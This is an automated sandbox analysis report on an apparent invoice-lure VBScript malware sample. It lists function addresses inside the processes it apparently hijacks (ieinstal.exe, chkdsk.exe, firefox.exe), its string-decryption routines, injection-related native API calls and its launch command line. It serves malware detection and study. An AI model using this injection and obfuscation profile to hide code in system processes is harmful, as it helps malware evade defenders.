Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0B10 27_2_1EFD0B10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD28C0 27_2_1EFD28C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFE6882 27_2_1EFE6882
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD9870 27_2_1EFD9870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEB870 27_2_1EFEB870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFB6868 27_2_1EFB6868
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08E9A6 27_2_1F08E9A6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0159C0 27_2_1F0159C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFFE810 27_2_1EFFE810
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD3800 27_2_1EFD3800
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F070835 27_2_1F070835
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCE9A0 27_2_1EFCE9A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F045870 27_2_1F045870
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F872 27_2_1F08F872
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0498B2 27_2_1F0498B2
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0818DA 27_2_1F0818DA
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0878F3 27_2_1F0878F3
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFCC6E0 27_2_1EFCC6E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F086757 27_2_1F086757
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0680 27_2_1EFD0680
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFF4670 27_2_1EFF4670
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEC600 27_2_1EFEC600
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F06D62C 27_2_1F06D62C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07D646 27_2_1F07D646
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD2760 27_2_1EFD2760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDA760 27_2_1EFDA760
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08A6C0 27_2_1F08A6C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0436EC 27_2_1F0436EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F6F6 27_2_1F08F6F6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F09A526 27_2_1F09A526
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD0445 27_2_1EFD0445
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F5C9 27_2_1F08F5C9
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0875C6 27_2_1F0875C6
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F03D480 27_2_1F03D480
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBD2EC 27_2_1EFBD2EC
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08F330 27_2_1F08F330
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F08124C 27_2_1F08124C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC1380 27_2_1EFC1380
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDE310 27_2_1EFDE310
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F09010E 27_2_1F09010E
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFDB0D0 27_2_1EFDB0D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F06D130 27_2_1F06D130
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFC00A0 27_2_1EFC00A0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFEB1E0 27_2_1EFEB1E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFD51C0 27_2_1EFD51C0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F07E076 27_2_1F07E076
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F00508C 27_2_1F00508C
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1EFBF113 27_2_1EFBF113
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0870F1 27_2_1F0870F1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050BA526 32_2_050BA526
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0445 32_2_04FF0445
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF5C9 32_2_050AF5C9
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A75C6 32_2_050A75C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0505D480 32_2_0505D480
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FEC6E0 32_2_04FEC6E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A6757 32_2_050A6757
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0680 32_2_04FF0680
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500C600 32_2_0500C600
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0508D62C 32_2_0508D62C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0509D646 32_2_0509D646
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05014670 32_2_05014670
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF2760 32_2_04FF2760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFA760 32_2_04FFA760
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AA6C0 32_2_050AA6C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050636EC 32_2_050636EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF6F6 32_2_050AF6F6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050B010E 32_2_050B010E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFB0D0 32_2_04FFB0D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0508D130 32_2_0508D130
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE00A0 32_2_04FE00A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500B1E0 32_2_0500B1E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF51C0 32_2_04FF51C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0509E076 32_2_0509E076
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0502508C 32_2_0502508C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FDF113 32_2_04FDF113
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A70F1 32_2_050A70F1
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FDD2EC 32_2_04FDD2EC
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF330 32_2_050AF330
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A124C 32_2_050A124C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE1380 32_2_04FE1380
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFE310 32_2_04FFE310
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFD27 32_2_050AFD27
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A7D4C 32_2_050A7D4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF3C60 32_2_04FF3C60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05002DB0 32_2_05002DB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE0C12 32_2_04FE0C12
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0508FDF4 32_2_0508FDF4
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF9DD0 32_2_04FF9DD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0509EC4C 32_2_0509EC4C
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A6C69 32_2_050A6C69
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AEC60 32_2_050AEC60
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05089C98 32_2_05089C98
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0D69 32_2_04FF0D69
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05008CDF 32_2_05008CDF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500FCE0 32_2_0500FCE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050BACEB 32_2_050BACEB
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FEAD00 32_2_04FEAD00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FE2EE8 32_2_04FE2EE8
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF1EB2 32_2_04FF1EB2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFF63 32_2_050AFF63
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AEFBF 32_2_050AEFBF
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A1FC6 32_2_050A1FC6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF6FE0 32_2_04FF6FE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05032E48 32_2_05032E48
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05010E50 32_2_05010E50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05090E6D 32_2_05090E6D
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A0EAD 32_2_050A0EAD
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A9ED2 32_2_050A9ED2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FFCF00 32_2_04FFCF00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF28C0 32_2_04FF28C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF9870 32_2_04FF9870
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FD6868 32_2_04FD6868
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AE9A6 32_2_050AE9A6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050359C0 32_2_050359C0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF3800 32_2_04FF3800
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0501E810 32_2_0501E810
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05090835 32_2_05090835
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FEE9A0 32_2_04FEE9A0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500B870 32_2_0500B870
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AF872 32_2_050AF872
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05006882 32_2_05006882
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050698B2 32_2_050698B2
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A18DA 32_2_050A18DA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050A78F3 32_2_050A78F3
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0502DB19 32_2_0502DB19
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFB2E 32_2_050AFB2E
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05064BC0 32_2_05064BC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050ACA13 32_2_050ACA13
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AEA5B 32_2_050AEA5B
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050AFA89 32_2_050AFA89
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0500FAA0 32_2_0500FAA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_04FF0B10 32_2_04FF0B10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071E7C6 32_2_0071E7C6
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00702D90 32_2_00702D90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00702D87 32_2_00702D87
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00709E50 32_2_00709E50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00709E4F 32_2_00709E4F
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_00702FB0 32_2_00702FB0
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE730232 37_2_00000265BE730232
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72F036 37_2_00000265BE72F036
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE7335CD 37_2_00000265BE7335CD
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE726082 37_2_00000265BE726082
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72AB30 37_2_00000265BE72AB30
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72AB32 37_2_00000265BE72AB32
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE72D912 37_2_00000265BE72D912
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE727D02 37_2_00000265BE727D02
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 04FDB910 appears 268 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 05025050 appears 36 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0506EF10 appears 105 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 05037BE4 appears 89 times
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: String function: 0505E692 appears 79 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F03E692 appears 82 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F04EF10 appears 105 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F005050 appears 36 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1EFBB910 appears 268 times
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: String function: 1F017BE4 appears 96 times
Contains functionality to call native functions
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002F00 NtCreateFile,LdrInitializeThunk, 27_2_1F002F00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002E50 NtCreateSection,LdrInitializeThunk, 27_2_1F002E50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002EB0 NtProtectVirtualMemory,LdrInitializeThunk, 27_2_1F002EB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002ED0 NtResumeThread,LdrInitializeThunk, 27_2_1F002ED0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002D10 NtQuerySystemInformation,LdrInitializeThunk, 27_2_1F002D10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002DA0 NtReadVirtualMemory,LdrInitializeThunk, 27_2_1F002DA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 27_2_1F002DC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C30 NtMapViewOfSection,LdrInitializeThunk, 27_2_1F002C30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C50 NtUnmapViewOfSection,LdrInitializeThunk, 27_2_1F002C50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002CF0 NtDelayExecution,LdrInitializeThunk, 27_2_1F002CF0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B10 NtAllocateVirtualMemory,LdrInitializeThunk, 27_2_1F002B10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B90 NtFreeVirtualMemory,LdrInitializeThunk, 27_2_1F002B90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002BC0 NtQueryInformationToken,LdrInitializeThunk, 27_2_1F002BC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002A80 NtClose,LdrInitializeThunk, 27_2_1F002A80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0029F0 NtReadFile,LdrInitializeThunk, 27_2_1F0029F0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002F30 NtOpenDirectoryObject, 27_2_1F002F30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002FB0 NtSetValueKey, 27_2_1F002FB0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002E00 NtQueueApcThread, 27_2_1F002E00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002E80 NtCreateProcessEx, 27_2_1F002E80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002EC0 NtQuerySection, 27_2_1F002EC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002D50 NtWriteVirtualMemory, 27_2_1F002D50
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C10 NtOpenProcess, 27_2_1F002C10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002C20 NtSetInformationFile, 27_2_1F002C20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F003C30 NtOpenProcessToken, 27_2_1F003C30
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F003C90 NtOpenThread, 27_2_1F003C90
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002CD0 NtEnumerateKey, 27_2_1F002CD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B00 NtQueryValueKey, 27_2_1F002B00
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B20 NtQueryInformationProcess, 27_2_1F002B20
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002B80 NtCreateKey, 27_2_1F002B80
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002BE0 NtQueryVirtualMemory, 27_2_1F002BE0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002A10 NtWriteFile, 27_2_1F002A10
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002AA0 NtQueryInformationFile, 27_2_1F002AA0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F002AC0 NtEnumerateValueKey, 27_2_1F002AC0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0029D0 NtWaitForSingleObject, 27_2_1F0029D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0038D0 NtGetContextThread, 27_2_1F0038D0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F004570 NtSuspendThread, 27_2_1F004570
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F0034E0 NtCreateMutant, 27_2_1F0034E0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Code function: 27_2_1F004260 NtSetContextThread, 27_2_1F004260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050234E0 NtCreateMutant,LdrInitializeThunk, 32_2_050234E0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022D10 NtQuerySystemInformation,LdrInitializeThunk, 32_2_05022D10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022DC0 NtAdjustPrivilegesToken,LdrInitializeThunk, 32_2_05022DC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C20 NtSetInformationFile,LdrInitializeThunk, 32_2_05022C20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C30 NtMapViewOfSection,LdrInitializeThunk, 32_2_05022C30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022CF0 NtDelayExecution,LdrInitializeThunk, 32_2_05022CF0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022F00 NtCreateFile,LdrInitializeThunk, 32_2_05022F00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022FB0 NtSetValueKey,LdrInitializeThunk, 32_2_05022FB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022E50 NtCreateSection,LdrInitializeThunk, 32_2_05022E50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050229F0 NtReadFile,LdrInitializeThunk, 32_2_050229F0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B00 NtQueryValueKey,LdrInitializeThunk, 32_2_05022B00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B10 NtAllocateVirtualMemory,LdrInitializeThunk, 32_2_05022B10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B80 NtCreateKey,LdrInitializeThunk, 32_2_05022B80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B90 NtFreeVirtualMemory,LdrInitializeThunk, 32_2_05022B90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022BC0 NtQueryInformationToken,LdrInitializeThunk, 32_2_05022BC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022A10 NtWriteFile,LdrInitializeThunk, 32_2_05022A10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022A80 NtClose,LdrInitializeThunk, 32_2_05022A80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022AC0 NtEnumerateValueKey,LdrInitializeThunk, 32_2_05022AC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05024570 NtSuspendThread, 32_2_05024570
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05024260 NtSetContextThread, 32_2_05024260
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022D50 NtWriteVirtualMemory, 32_2_05022D50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022DA0 NtReadVirtualMemory, 32_2_05022DA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C10 NtOpenProcess, 32_2_05022C10
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05023C30 NtOpenProcessToken, 32_2_05023C30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022C50 NtUnmapViewOfSection, 32_2_05022C50
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05023C90 NtOpenThread, 32_2_05023C90
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022CD0 NtEnumerateKey, 32_2_05022CD0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022F30 NtOpenDirectoryObject, 32_2_05022F30
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022E00 NtQueueApcThread, 32_2_05022E00
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022E80 NtCreateProcessEx, 32_2_05022E80
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022EB0 NtProtectVirtualMemory, 32_2_05022EB0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022EC0 NtQuerySection, 32_2_05022EC0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022ED0 NtResumeThread, 32_2_05022ED0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050229D0 NtWaitForSingleObject, 32_2_050229D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_050238D0 NtGetContextThread, 32_2_050238D0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022B20 NtQueryInformationProcess, 32_2_05022B20
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022BE0 NtQueryVirtualMemory, 32_2_05022BE0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_05022AA0 NtQueryInformationFile, 32_2_05022AA0
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A350 NtCreateFile, 32_2_0071A350
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A400 NtReadFile, 32_2_0071A400
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A480 NtClose, 32_2_0071A480
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A530 NtAllocateVirtualMemory, 32_2_0071A530
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A3FA NtReadFile, 32_2_0071A3FA
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A47A NtClose, 32_2_0071A47A
Source: C:\Windows\SysWOW64\chkdsk.exe Code function: 32_2_0071A52A NtAllocateVirtualMemory, 32_2_0071A52A
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 37_2_00000265BE730232 NtCreateFile,NtWriteFile, 37_2_00000265BE730232
Java / VBScript file with very long strings (likely obfuscated code)
Source: WWVN_INVOICE_8363567453.vbs Initial sample: Strings found which are bigger than 50
Tries to load missing DLLs
Source: C:\Windows\System32\wscript.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Windows\SysWOW64\chkdsk.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Section loaded: edgegdi.dll Jump to behavior
Source: WWVN_INVOICE_8363567453.vbs ReversingLabs: Detection: 24%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
